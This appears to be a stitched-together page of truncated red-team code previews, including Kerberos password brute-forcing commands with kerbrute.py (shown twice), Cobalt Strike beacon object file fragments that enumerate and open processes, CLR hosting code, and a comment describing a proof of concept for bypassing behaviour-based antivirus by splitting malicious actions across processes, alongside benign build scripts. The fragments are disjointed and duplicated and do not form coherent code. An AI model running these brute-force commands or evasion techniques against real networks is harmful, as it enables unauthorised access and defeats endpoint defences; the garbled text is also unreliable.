With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With a Rubeus version that includes the brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With a Rubeus version that includes the brute module:
#include <windows.h> | |
#include <stdio.h> | |
#include <dsgetdc.h> | |
#include <psapi.h> | |
extern "C" { | |
#include "beacon.h" | |
}; | |
// Compile as C++ (/TP) for decltype |
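# Two-machine procedure: the export dump is produced on Windows, then
# normalised on Linux. The stray trailing pipe characters left over from the
# page's table layout are removed so each command can be run as written.

# --- On Windows, inside a VS developer prompt ---
# Dump the export table of msvcrt.dll to a text file
dumpbin.exe /exports C:\Windows\System32\msvcrt.dll > msvcrt.txt

# --- On Linux, after copying msvcrt.txt over ---
# Convert the file from Windows (CRLF) to Unix (LF) line endings
dos2unix msvcrt.txt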
#include "stdafx.h" | |
int main() | |
{ | |
ICLRMetaHost *metaHost = NULL; | |
IEnumUnknown *runtime = NULL; | |
ICLRRuntimeInfo *runtimeInfo = NULL; | |
ICLRRuntimeHost *runtimeHost = NULL; | |
IUnknown *enumRuntime = NULL; | |
LPWSTR frameworkName = NULL; |
#include <string.h> | |
#include <stdio.h> | |
#include <windows.h> | |
#include <psapi.h> | |
#include "beacon.h" | |
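/*
 * Imports declared in the LIBRARY$Function naming form used alongside beacon.h.
 * Each name is expected to be bound to the matching kernel32.dll export when the
 * object file is loaded (NOTE(review): confirm against the loader in use).
 *
 * DECLSPEC_IMPORT alone is used on all three declarations: WINBASEAPI normally
 * expands to the same attribute, so repeating it on OpenProcess was redundant
 * and inconsistent with its neighbours.
 */

/* Fills lpidProcess with process identifiers. cb is the array size in bytes;
 * *lpcbNeeded receives the number of bytes actually written. */
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *lpidProcess, DWORD cb, LPDWORD lpcbNeeded);

/* Returns a process handle, or NULL on failure. The caller owns the handle and
 * must release it with CloseHandle; request the narrowest dwDesiredAccess that
 * the following calls need. Process-access telemetry (for example Sysmon
 * event ID 10) records these opens together with the requested access mask. */
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);

/* Fills lphModule with the module handles loaded in hProcess. cb is the array
 * size in bytes, *lpcbNeeded the size required, and dwFilterFlag selects which
 * modules (32-bit, 64-bit or all) are listed. */
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE hProcess, HMODULE *lphModule, DWORD cb, LPDWORD lpcbNeeded, DWORD dwFilterFlag);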
/*
This is a POC for a generic technique that I named "Divide and Conquer" internally during our red team assessment; it can be used to bypass behavior-based NextGen AV detection. It works by splitting malicious actions and API calls across distinct processes, so detection has to correlate activity across processes rather than judge each process on its own.
*/
#include <stdio.h> | |
#include <tchar.h> | |
#include <windows.h> | |
#include "Commctrl.h" | |
#include <string> |
#define APSTUDIO_READONLY_SYMBOLS | |
#include "winres.h" | |
VS_VERSION_INFO VERSIONINFO | |
FILEVERSION 1,3,3,4 | |
PRODUCTVERSION 1,3,3,1 | |
FILEFLAGSMASK 0x3fL | |
#ifdef _DEBUG | |
FILEFLAGS 0x1L | |
#else |
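@echo off
:: Builds Resource.o (a COFF object file) from Resource.rc.
:: This batch script should be run from a VS developer prompt.

:: rc compiles the resource script into a binary .res file.
rc Resource.rc
:: Stop if rc failed, so cvtres never converts a stale Resource.res.
if errorlevel 1 exit /b 1

:: cvtres converts the .res file to a COFF object file.
cvtres /MACHINE:x64 /OUT:Resource.o Resource.res
if errorlevel 1 exit /b 1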
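#!/bin/bash
# Builds Resource.o (a COFF object file) from Resource.rc with windres.
# This script needs mingw installed.

# Abort on the first failing step so a stale Resource.res is never converted.
set -euo pipefail

# Step 1: convert the .rc resource script into a binary .res resource file.
x86_64-w64-mingw32-windres -J rc -i Resource.rc -O res -o Resource.res

# Step 2: convert the binary .res resource file into a COFF object file.
x86_64-w64-mingw32-windres -J res -i Resource.res -O coff -o Resource.o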
/* | |
================================ Compile as a .Net DLL ============================== | |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs | |
*/ | |
using System.Windows.Forms; | |
namespace TestNamespace |